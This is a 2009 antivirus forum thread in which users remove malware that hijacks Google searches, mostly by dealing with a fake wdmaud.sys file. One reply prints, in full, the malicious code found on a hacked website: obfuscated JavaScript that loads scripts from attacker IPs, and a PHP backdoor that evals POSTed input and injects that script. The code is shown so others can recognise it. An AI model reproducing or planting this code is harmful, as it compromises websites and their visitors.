Author Topic: Blocked 78.110.175.21 and bogus google links  (Read 24244 times)

0 Members and 1 Guest are viewing this topic.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88772
  • No support PMs thanks
Re: Blocked 78.110.175.21 and bogus google links
« Reply #15 on: January 01, 2009, 04:52:22 PM »
Anyone with a copy of this file should submit it to avast.

Send the sample to virus@avast.com zipped and password protected with the password in email body, a link to this topic might help and undetected malware in the subject.

Or you can also add the file to the User Files (File, Add) section of the avast chest (if it isn't already there) where it can do no harm and send it from there (select the file, right click, email to Alwil Software). No need to zip and PW protect when the sample is sent from chest. A copy of the file/s will remain in the original location, so any further action you take can remove that. Send it from the User Files section of the chest (select the file, right click, email to Alwil Software).

This process has been modified in the latest version to make it easier, it doesn't actually get emailed, but transferred when the next avast auto (or manual) update is done.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.1.6099 (build 24.1.8821.762) UI 1.0.796/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

entulsar

  • Guest
Re: Blocked 78.110.175.21 and bogus google links
« Reply #16 on: January 01, 2009, 04:56:26 PM »
I GOT THIS IN VISTA BUT ONLY WHEN I TRY TO LOG ONTO A GAME CALLED GRUDGE MU,NOW I GO HUNTING  HEHE

spg SCOTT

  • Guest
Re: Blocked 78.110.175.21 and bogus google links
« Reply #17 on: January 01, 2009, 05:21:34 PM »
Yes!  I had the wrong folder!  Deleting c:\windows\system32\drivers\wdmaud.sys worked perfectly!  Thanks Nobody71!

Isn't that the one you said previously didn't work? ???

Deleting wdmaud.sys from the drivers folder didn't fix my problem (exact symptoms as everybody else with 7.7.7.0 and 78.110.175.21) .  BTW as soon as I delete the file, another one pops back up in that folder.

is that the one you deleted or did you delete the one in the system32 folder, I'm confused

bahog

  • Guest
Re: Blocked 78.110.175.21 and bogus google links
« Reply #18 on: January 01, 2009, 08:09:08 PM »
Nobody71,

Renamed wdmaud.sys file, put copy into chest, deleted system 32 file. Google search has no redirection and no more two minute warning.

Love your work

Many thanks.

bahog

bahog

  • Guest
Re: Blocked 78.110.175.21 and bogus google links
« Reply #19 on: January 01, 2009, 08:22:05 PM »
Anyone with a copy of this file should submit it to avast.
Or you can also add the file to the User Files (File, Add) section of the avast chest (if it isn't already there) where it can do no harm and send it from there.

Consider this done.

Bahog

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88772
  • No support PMs thanks
Re: Blocked 78.110.175.21 and bogus google links
« Reply #20 on: January 01, 2009, 08:32:36 PM »
Thanks for helping improve detections.

Welcome to the forums.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.1.6099 (build 24.1.8821.762) UI 1.0.796/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Aokin

  • Guest
Re: Blocked 78.110.175.21 and bogus google links
« Reply #21 on: January 01, 2009, 09:07:39 PM »
Thanks Nobody71

ozwally

  • Guest
Re: Blocked 78.110.175.21 and bogus google links
« Reply #22 on: January 01, 2009, 11:36:41 PM »
I put that file in the virus chest first, but this alone didn't prevent the problem. Is it supposed to?
(I didn't restart though)

Renaming it solved all of my symptoms (Javascript is back on with no problems).

Thanks everyone for your help.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88772
  • No support PMs thanks
Re: Blocked 78.110.175.21 and bogus google links
« Reply #23 on: January 02, 2009, 12:19:38 AM »
Moving it to the chest (after a detection) would achieve the same as renaming it (the file essentially isn't there, not in the original name or if moved the the chest). Hhowever, if you manually send a copy to the chest then there will still be a copy in the original location as my previous post mentioned.

Quote from: DavidR
Or you can also add the file to the User Files (File, Add) section of the avast chest (if it isn't already there) where it can do no harm and send it from there (select the file, right click, email to Alwil Software). No need to zip and PW protect when the sample is sent from chest. A copy of the file/s will remain in the original location, so any further action you take can remove that. Send it from the User Files section of the chest (select the file, right click, email to Alwil Software).

I have highlighted the relevant bit, you probably missed that buried amongst all the other info.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.1.6099 (build 24.1.8821.762) UI 1.0.796/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

ras

  • Guest
Re: Blocked 78.110.175.21 and bogus google links
« Reply #24 on: January 02, 2009, 12:29:44 AM »
I had the same Blocked message popping up. It started after my website has been hacked.   It is due to hacked html files or php files where the hacker inserted the following codes when you view the page source:

<script language=javascript><!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('@/|%2F%3C|%64%69%76&%20$%73$%74%79@%6C@e$%3D%64%69%73%70%6C&%61y$%3A~n#%6F~n~e$%3E\n!%64$%6F%63&%75`me%6E%74|.@%77~r#%69`t`%65(~"#%3C#/t!%65xt~a%72`%65@%61$%3E%22%29$%3B%76%61%72`%20%69`%2C_%2C%61&%3D[`"!7%38#%2E&110~%2E$%31`%375!%2E2|1#"@%2C#%22$%31%39%35%2E%32~%34.~7%36&%2E!2|5%31"|%5D~;!_@=1`;i%66$%28%64%6F|c&%75m|e%6Et#.c#o|%6F%6Bie`.%6D|a%74c!h~%28$%2F&%5C@b@h%67|%66t|%3D~%31|/%29`%3D%3D`%6E!%75~%6C#l)%66&o~%72|(@i%3D0%3B%69%3C@2|%3B%69&%2B%2B@)|%64$%6F%63&%75%6De%6E$%74%2E&%77ri#%74%65!(#"@%3C%73%63%72!i!p$%74$%3E%69@f$%28%5F%29%64$%6F%63$%75%6D%65%6E#t%2E%77%72&i!te`(|%5C"#%3Cs#c@r`i$%70%74!%20|i&%64=%5F|%22!+i%2B@"%5F$%20%73!%72`c=/%2F$%22@+#a%5Bi]%2B&"%2F@%63%70%2F|?"%2B%6E|%61%76i%67a@%74or%2E&a%70p~%4E&%61m|e.!c`%68%61&%72`%41#t|%28$%30`%29!+"`%3E|%3C~%5C%5C/s%63#r%69&%70t%3E%5C")%3C#%5C/!%73cr#ip~t%3E%22%29;\n/%2F&%3C|%2Fd#i%76%3E').replace(/\||@|\$|~|\!|#|\&|`/g,""));var yahoo_counter=1;
<!-- counter end --></script>

OR FOR PHP

<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2YoeWFob29fY291bnRlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCdAL3wlMkYlM0N8JTY0JTY5JTc2JiUyMCQlNzMkJTc0JTc5QCU2Q0BlJCUzRCU2NCU2OSU3MyU3MCU2QyYlNjF5JCUzQX5uIyU2Rn5ufmUkJTNFXG4hJTY0JCU2RiU2MyYlNzVgbWUlNkUlNzR8LkAlNzd+ciMlNjlgdGAlNjUofiIjJTNDIy90ISU2NXh0fmElNzJgJTY1QCU2MSQlM0UlMjIlMjkkJTNCJTc2JTYxJTcyYCUyMCU2OWAlMkNfJTJDJTYxJiUzRFtgIiE3JTM4IyUyRSYxMTB+JTJFJCUzMWAlMzc1ISUyRTJ8MSMiQCUyQyMlMjIkJTMxJTM5JTM1JTJFJTMyfiUzNC5+NyUzNiYlMkUhMnw1JTMxInwlNUR+OyFfQD0xYDtpJTY2JCUyOCU2NCU2RnxjJiU3NW18ZSU2RXQjLmMjb3wlNkYlNkJpZWAuJTZEfGElNzRjIWh+JTI4JCUyRiYlNUNAYkBoJTY3fCU2NnR8JTNEfiUzMXwvJTI5YCUzRCUzRGAlNkUhJTc1fiU2QyNsKSU2NiZvfiU3MnwoQGklM0QwJTNCJTY5JTNDQDJ8JTNCJTY5JiUyQiUyQkApfCU2NCQlNkYlNjMmJTc1JTZEZSU2RSQlNzQlMkUmJTc3cmkjJTc0JTY1ISgjIkAlM0MlNzMlNjMlNzIhaSFwJCU3NCQlM0UlNjlAZiQlMjglNUYlMjklNjQkJTZGJTYzJCU3NSU2RCU2NSU2RSN0JTJFJTc3JTcyJmkhdGVgKHwlNUMiIyUzQ3MjY0ByYGkkJTcwJTc0ISUyMHxpJiU2ND0lNUZ8JTIyIStpJTJCQCIlNUYkJTIwJTczISU3MmBjPS8lMkYkJTIyQCsjYSU1QmldJTJCJiIlMkZAJTYzJTcwJTJGfD8iJTJCJTZFfCU2MSU3NmklNjdhQCU3NG9yJTJFJmElNzBwfiU0RSYlNjFtfGUuIWNgJTY4JTYxJiU3MmAlNDEjdHwlMjgkJTMwYCUyOSErImAlM0V8JTNDfiU1QyU1Qy9zJTYzI3IlNjkmJTcwdCUzRSU1QyIpJTNDIyU1Qy8hJTczY3IjaXB+dCUzRSUyMiUyOTtcbi8lMkYmJTNDfCUyRmQjaSU3NiUzRScpLnJlcGxhY2UoL1x8fEB8XCR8fnxcIXwjfFwmfGAvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg=='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'\"][^\s\'\"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

I am still in the process of cleaning these unwanted codes on my web files. :(

If any still encounters the same problem, try checking the page source of the website you are currently browsing and see if there are suspect codes in it.

klal

  • Guest
Re: Blocked 78.110.175.21 and bogus google links
« Reply #25 on: January 02, 2009, 02:27:26 AM »
Had this same annoying problem of fake Google searches and blocked attempts to access that malicious website - thanks to the solution highlighted in this thread, I managed to get rid of the problem.  Wish I  had read this a bit earlier and saved myself some agony.

REDACTED

  • Guest
Re: Blocked 78.110.175.21 and bogus google links
« Reply #26 on: January 02, 2009, 03:42:51 AM »
Had this same annoying problem of fake Google searches and blocked attempts to access that malicious website - thanks to the solution highlighted in this thread, I managed to get rid of the problem.  Wish I  had read this a bit earlier and saved myself some agony.

What solution is highlighted? Where? I'm new here so please excuse my ignorance.

randelfi

  • Guest
Re: Blocked 78.110.175.21 and bogus google links
« Reply #27 on: January 02, 2009, 04:04:47 AM »
I found several references online to various malware hiding as a legitimate Windows driver, wdmaud.sys, which is an audio-related driver.  There should only be two files with this name in the following two locations:

C:\WINDOWS\SYSTEM32\wdmaud.drv
and
C:\WINDOWS\SYSTEM32\DRIVERS\wdmaud.sys

In my case, there was a bogus "wdmaud.sys" in the SYSTEM32 folder (not the \DRIVERS subfolder).  I did the following:
1. Rename all *wdmaud*.* files to "zzz_wdmaud.*.
2. Run the Windows system file comparator from the Command Window as sfc /SCANNOW.  This restores the correct wdmaud files.
3. Once everything is running again, delete the renamed files.

This appears to have ended the "blocked access to infected site 78.110.175.21" message for me. 

By the way, I ran Avast!, SpywareDoctor, CounterSpy and CCleaner (to elminate old junk) and none of these detected anything!

Richard



Offline spydier

  • Newbie
  • *
  • Posts: 2
Re: Blocked 78.110.175.21 and bogus google links
« Reply #28 on: January 02, 2009, 08:28:56 AM »
This also worked for me as an apparent instant fix to delete the file

seems a little too easy once you get the right file haha

Many thanks to the finder nobody71

phil i suggest reading the thread from page one, it wont take long and if you have the bug in question it appears this is the fix


klal

  • Guest
Re: Blocked 78.110.175.21 and bogus google links
« Reply #29 on: January 02, 2009, 01:03:45 PM »
Hi Phil,

The solution refers to the moving of the file wdmaud.sys that you will most likely find in the c:\windows\system32 directory to the quarantine area (using Avast!)

Here's the link to the post: http://forum.avast.com/index.php?topic=41423.msg347589#msg347589

Cheers,
Lal

Had this same annoying problem of fake Google searches and blocked attempts to access that malicious website - thanks to the solution highlighted in this thread, I managed to get rid of the problem.  Wish I  had read this a bit earlier and saved myself some agony.

What solution is highlighted? Where? I'm new here so please excuse my ignorance.